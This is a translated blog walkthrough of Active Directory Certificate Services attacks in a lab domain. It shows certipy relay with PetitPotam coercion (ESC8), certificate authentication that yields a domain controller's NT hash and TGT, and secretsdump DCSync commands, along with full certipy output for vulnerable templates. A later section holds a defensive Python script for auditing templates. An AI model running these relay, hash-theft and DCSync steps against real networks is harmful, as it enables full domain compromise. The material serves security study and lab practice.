ESC8 with certipy + ADCS
ESC8 with certipy
• Oliver Lyak's ADCS attack tool certipy can run the relay as well. Set up the listener:
sudo certipy relay -ca 192.168.56.23 -template DomainController
• As before with PetitPotam, trigger the coercion:
sudo python3 PetitPotam.py 192.168.56.109 meereen.essos.local
• With the certificate meereen.pfx obtained, the following command retrieves the DC's NT hash and a TGT:
certipy auth -pfx meereen.pfx -dc-ip 192.168.56.12
wulala@wulala-VirtualBox:~/intranet-tools/Certipy-4.4.0$ sudo certipy auth -pfx meereen.pfx -dc-ip 192.168.56.12
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: meereen$@essos.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'meereen.ccache'
[*] Trying to retrieve NT hash for 'meereen$'
[*] Got hash for 'meereen$@essos.local': aad3b435b51404eeaad3b435b51404ee:a67ca990438d4a00ff68f68132c9bd77
• As above, we can use secretsdump together with the ticket we obtained to launch a DCSync:
sudo -s
export KRB5CCNAME=meereen.ccache
python3 /home/wulala/intranet-tools/myimpacket/examples/secretsdump.py -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local
• Or use the hash instead:
Intranet PTH attacks - Xianzhi Community (aliyun.com)
python3 /home/wulala/intranet-tools/myimpacket/examples/secretsdump.py -hashes 'aad3b435b51404eeaad3b435b51404ee:a67ca990438d4a00ff68f68132c9bd77' -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local
ADCS - reconnaissance and enumeration
Scanning and enumerating ADCS with certipy and BloodHound
How To Install and Configure Neo4j on Ubuntu 20.04 | DigitalOcean
AD CS – What could be misconfigured? – HTTP418 InfoSec (http418infosec.com)
AD CS – The ‘Certified Pre-Owned’ Attacks – HTTP418InfoSec
• Start the enumeration with certipy:
certipy find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12
# The data this produces is for ly4k's BloodHound build (https://github.com/ly4k/BloodHound/releases/download/), which adds the relevant PKI searches
certipy find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12 -old-bloodhound # with this flag the data imports into a stock BloodHound installation
[*] Saved BloodHound data to '20230524135954_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230524135954_Certipy.txt'
[*] Saved JSON output to '20230524135954_Certipy.json'
This searches the certificate servers and dumps all the required information in three formats:
bloodhound : a zip ready to import into BloodHound (with certipy 4.0 you must install the BloodHound GUI modified by Oliver Lyak; if you do not want the modified version, use the -old-bloodhound option)
json : the information in JSON format
txt : the information in text format
cd ~/intranet-tools
wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound
rm BloodHound-linux-x64.zip
# install neo4j (credentials neo4j/1qaz1qaz)
neo4j start
./BloodHound --no-sandbox --disable-dev-shm-usage
# the same setup was done earlier, so it is not repeated on Ubuntu here.
• Certipy 4.0 also reintroduced the -vulnerable option to scan for which configurations are attackable.
certipy find -u khal.drogo@essos.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
root@wulala-VirtualBox:/home/wulala/intranet-tools/Certipy-4.4.0# sudo certipy find -u khal.drogo@essos.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 38 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 16 enabled certificate templates
[*] Trying to get CA configuration for 'ESSOS-CA' via CSRA
[*] Got CA configuration for 'ESSOS-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : ESSOS-CA
DNS Name : braavos.essos.local
Certificate Subject : CN=ESSOS-CA, DC=essos, DC=local
Certificate Serial Number : 136E773F913158B942E0FB8D7FDC976E
Certificate Validity Start : 2023-04-26 12:53:26+00:00
Certificate Validity End : 2028-04-26 13:03:25+00:00
Web Enrollment : Enabled
User Specified SAN : Enabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : ESSOS.LOCAL\Administrators
Access Rights
ManageCertificates : ESSOS.LOCAL\Administrators
ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Enterprise Admins
ManageCa : ESSOS.LOCAL\Administrators
ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Enterprise Admins
Enroll : ESSOS.LOCAL\Authenticated Users
[!] Vulnerabilities
ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
0
Template Name : ESC4
Display Name : ESC4
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectRequireEmail
SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
PublishToDs
PendAllRequests
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Code Signing
Requires Manager Approval : True
Requires Key Archival : False
Authorized Signatures Required : 1
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCAL\Domain Users
Object Control Permissions
Owner : ESSOS.LOCAL\Enterprise Admins
Full Control Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\khal.drogo
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Owner Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\khal.drogo
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Dacl Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\khal.drogo
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Property Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\khal.drogo
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
[!] Vulnerabilities
ESC4 : 'ESSOS.LOCAL\khal.drogo' has dangerous permissions
1
Template Name : ESC3-CRA
Display Name : ESC3-CRA
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
Private Key Flag : 16777216
65536
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCAL\Domain Users
Object Control Permissions
Owner : ESSOS.LOCAL\Enterprise Admins
Full Control Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Owner Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Dacl Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Property Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
[!] Vulnerabilities
ESC3 : 'ESSOS.LOCAL\Domain Users' can enroll and template has Certificate Request Agent EKU set
2
Template Name : ESC2
Display Name : ESC2
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
Private Key Flag : 16777216
65536
Extended Key Usage : Any Purpose
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCAL\Domain Users
Object Control Permissions
Owner : ESSOS.LOCAL\Enterprise Admins
Full Control Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Owner Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Dacl Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Property Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
[!] Vulnerabilities
ESC2 : 'ESSOS.LOCAL\Domain Users' can enroll and template can be used for any purpose
ESC3 : 'ESSOS.LOCAL\Domain Users' can enroll and template has Certificate Request Agent EKU set
3
Template Name : ESC1
Display Name : ESC1
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16777216
65536
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCAL\Domain Users
Object Control Permissions
Owner : ESSOS.LOCAL\Enterprise Admins
Full Control Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Owner Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Dacl Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
Write Property Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Local System
ESSOS.LOCAL\Enterprise Admins
[!] Vulnerabilities
ESC1 : 'ESSOS.LOCAL\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
root@wulala-VirtualBox:/home/wulala/intranet-tools/Certipy-4.4.0#
• A template exploitable via ESC1 has:
• Enrollment rights for all domain users
• Client authentication
• And enrollee supplies subject
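The conditions above are what certipy's -vulnerable scan evaluates for each template. As an added audit example (not code from this post or from certipy), the Python below parses the flat "Key : Value" text that certipy find prints with -stdout, as shown in the output above, and re-derives the template findings from the raw fields, so a defender can see which individual setting needs fixing: an enrollee-supplied subject on an authentication-capable template, an Any Purpose or Certificate Request Agent EKU, issuance without approval or co-signature, or a non-admin principal with write rights over the template object. It goes beyond the ESC1 case in the text and covers ESC2, ESC3 and ESC4 as well. The field names follow the output above; the SAMPLE_CERTIPY_TEXT input, the LOW_PRIV_GROUPS and PRIVILEGED sets and all function names are constructed assumptions.

```python
# Added audit example, not from the original post or from certipy: re-derive
# ESC1-ESC4 template findings from certipy's "Key : Value" text output.
from typing import Dict, List

# Assumed groups that nearly every domain principal belongs to; enrollment rights
# for these make a template reachable by any low-privileged account.
LOW_PRIV_GROUPS = {"domain users", "authenticated users", "domain computers", "everyone"}
# Assumed principals that legitimately control templates; anyone else with
# write rights over the template object is an ESC4-style finding.
PRIVILEGED = {"domain admins", "enterprise admins", "administrators", "local system"}
SECTION_HEADERS = {"permissions", "enrollment permissions", "object control permissions"}
MULTI_VALUE = {"extended key usage", "enrollment rights", "full control principals",
               "write owner principals", "write dacl principals", "write property principals"}

# Constructed sample modelled on the certipy output shown above (not real output).
SAMPLE_CERTIPY_TEXT = r"""
0
Template Name : ESC1
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : True
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Authorized Signatures Required : 0
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCAL\Domain Users
Object Control Permissions
Full Control Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\Enterprise Admins
1
Template Name : ESC4
Enabled : True
Extended Key Usage : Code Signing
Requires Manager Approval : True
Authorized Signatures Required : 1
Enrollment Rights : ESSOS.LOCAL\Domain Users
Write Dacl Principals : ESSOS.LOCAL\Domain Admins
ESSOS.LOCAL\khal.drogo
ESSOS.LOCAL\Local System
2
Template Name : ESC2
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Extended Key Usage : Any Purpose
Requires Manager Approval : False
Authorized Signatures Required : 0
Enrollment Rights : ESSOS.LOCAL\Domain Users
Full Control Principals : ESSOS.LOCAL\Domain Admins
"""


def parse_templates(text: str) -> List[dict]:
    """Turn certipy's flat listing into one dict per template (keys lower-cased)."""
    templates: List[dict] = []
    current: dict = {}
    last_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.isdigit():                      # certipy numbers each template
            current = {}
            templates.append(current)
            last_key = None
        elif line.startswith("[!]") or line.lower() in SECTION_HEADERS:
            last_key = None                     # headings carry no value
        elif " : " in line:
            key, value = (p.strip() for p in line.split(" : ", 1))
            key = key.lower()
            current[key] = [value] if key in MULTI_VALUE else value
            last_key = key
        elif last_key in MULTI_VALUE:
            current[last_key].append(line)      # continuation of a multi-valued field
    return templates


def short_name(principal: str) -> str:
    """'ESSOS.LOCAL\\Domain Users' -> 'domain users'."""
    return principal.rsplit("\\", 1)[-1].strip().lower()


def is_true(t: dict, key: str) -> bool:
    return t.get(key, "False") == "True"


def audit_template(t: dict) -> List[str]:
    """Return the ESC codes whose preconditions this template meets."""
    findings: List[str] = []
    if not is_true(t, "enabled"):
        return findings
    enrollers = {short_name(p) for p in t.get("enrollment rights", [])}
    broad_enroll = bool(enrollers & LOW_PRIV_GROUPS)
    # Issuance is unattended when nobody has to approve or co-sign the request.
    unattended = (not is_true(t, "requires manager approval")
                  and t.get("authorized signatures required", "0") == "0")
    if broad_enroll and unattended:
        if is_true(t, "enrollee supplies subject") and is_true(t, "client authentication"):
            findings.append("ESC1")   # requester chooses the subject/SAN of an auth cert
        if is_true(t, "any purpose") or not t.get("extended key usage"):
            findings.append("ESC2")   # Any Purpose EKU, or no EKU at all
        if is_true(t, "enrollment agent"):
            findings.append("ESC3")   # Certificate Request Agent EKU
    controllers: set = set()
    for key in ("full control principals", "write owner principals",
                "write dacl principals", "write property principals"):
        controllers |= {short_name(p) for p in t.get(key, [])}
    if controllers - PRIVILEGED:
        findings.append("ESC4")       # a non-admin principal can rewrite the template
    return findings


def audit_all(text: str) -> Dict[str, List[str]]:
    return {t["template name"]: audit_template(t) for t in parse_templates(text)}


if __name__ == "__main__":
    for name, codes in audit_all(SAMPLE_CERTIPY_TEXT).items():
        print(f"{name:10} {', '.join(codes) or 'no findings'}")
```

Run directly, it prints one line per template; pointed at a real -stdout capture, the ESC4 branch is the one worth reading first, because write rights for an ordinary user over a template let that user turn a harmless template into an ESC1 one, so the remediation is an ACL change on the template object rather than a template setting.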
There is also ESC2. Next, the walkthrough opens BloodHound directly on Ubuntu and imports the zip generated by certipy:
# don't use the stock BloodHound here; use ly4k's build, which adds PKI-related analysis queries
cd /opt/tools
wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound4.2-ly4k
rm BloodHound-linux-x64.zip
neo4j start
/opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usage
A quick look:
1. PKI -> Find certificate authority; 2. select the certificate authority and click "see enabled templates".
Following the official walkthrough, find ESC4; it can be seen here as well.
Originally published on the WeChat public account (wulala520): ESC8 with certipy + ADCS